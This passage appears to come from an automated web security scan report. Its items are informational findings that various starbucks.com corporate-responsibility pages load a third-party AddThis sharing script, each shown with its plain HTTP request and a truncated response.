GET /responsibility/community/ethos-water-fund HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:14 GMT
Connection: close
Content-Length: 36669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.271. http://www.starbucks.com/responsibility/community/starbucks-foundation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-foundation

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/starbucks-foundation HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:12 GMT
Connection: close
Content-Length: 39215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.272. http://www.starbucks.com/responsibility/community/starbucks-red  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-red

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/starbucks-red HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:04 GMT
Connection: close
Content-Length: 41685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.273. http://www.starbucks.com/responsibility/community/youth-action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/youth-action

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/youth-action HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:00 GMT
Connection: close
Content-Length: 39901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.274. http://www.starbucks.com/responsibility/diversity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/diversity

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/diversity HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:51 GMT
Connection: close
Content-Length: 37965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.275. http://www.starbucks.com/responsibility/diversity/suppliers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/diversity/suppliers

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/diversity/suppliers HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:16 GMT
Connection: close
Content-Length: 38852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.276. http://www.starbucks.com/responsibility/environment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/environment HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:57 GMT
Connection: close
Content-Length: 50520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.277. http://www.starbucks.com/responsibility/environment/climate-change  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/climate-change

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/environment/climate-change HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:28 GMT
Connection: close
Content-Length: 40132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.278. http://www.starbucks.com/responsibility/environment/energy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/energy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/environment/energy HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:11 GMT
Connection: close
Content-Length: 38952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.279. http://www.starbucks.com/responsibility/environment/explore-green-store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/explore-green-store

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/environment/explore-green-store HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:51 GMT
Connection: close
Content-Length: 36506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.280. http://www.starbucks.com/responsibility/environment/green-building  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/green-building

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/environment/green-building HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:23 GMT
Connection: close
Content-Length: 40583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.281. http://www.starbucks.com/responsibility/environment/recycling  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/recycling

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/environment/recycling HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:05 GMT
Connection: close
Content-Length: 42967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.282. http://www.starbucks.com/responsibility/environment/water  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/water

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/environment/water HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:20 GMT
Connection: close
Content-Length: 38993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.283. http://www.starbucks.com/responsibility/learn-more/goals-and-progress  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/goals-and-progress

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/learn-more/goals-and-progress HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:33 GMT
Connection: close
Content-Length: 45256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.284. http://www.starbucks.com/responsibility/learn-more/policies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/policies

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/learn-more/policies HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:08 GMT
Connection: close
Content-Length: 37906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.285. http://www.starbucks.com/responsibility/learn-more/relationships  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/relationships

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/learn-more/relationships HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:06 GMT
Connection: close
Content-Length: 47824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.286. http://www.starbucks.com/responsibility/learn-more/shared-values-blog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/shared-values-blog

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/learn-more/shared-values-blog HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:33 GMT
Connection: close
Content-Length: 46198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.287. http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/starbucks-shared-planet

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/learn-more/starbucks-shared-planet HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:27 GMT
Connection: close
Content-Length: 37200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.288. http://www.starbucks.com/responsibility/sourcing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/sourcing HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:30 GMT
Connection: close
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.289. http://www.starbucks.com/responsibility/sourcing/cocoa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/cocoa

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/sourcing/cocoa HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:56 GMT
Connection: close
Content-Length: 38549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.290. http://www.starbucks.com/responsibility/sourcing/coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/sourcing/coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
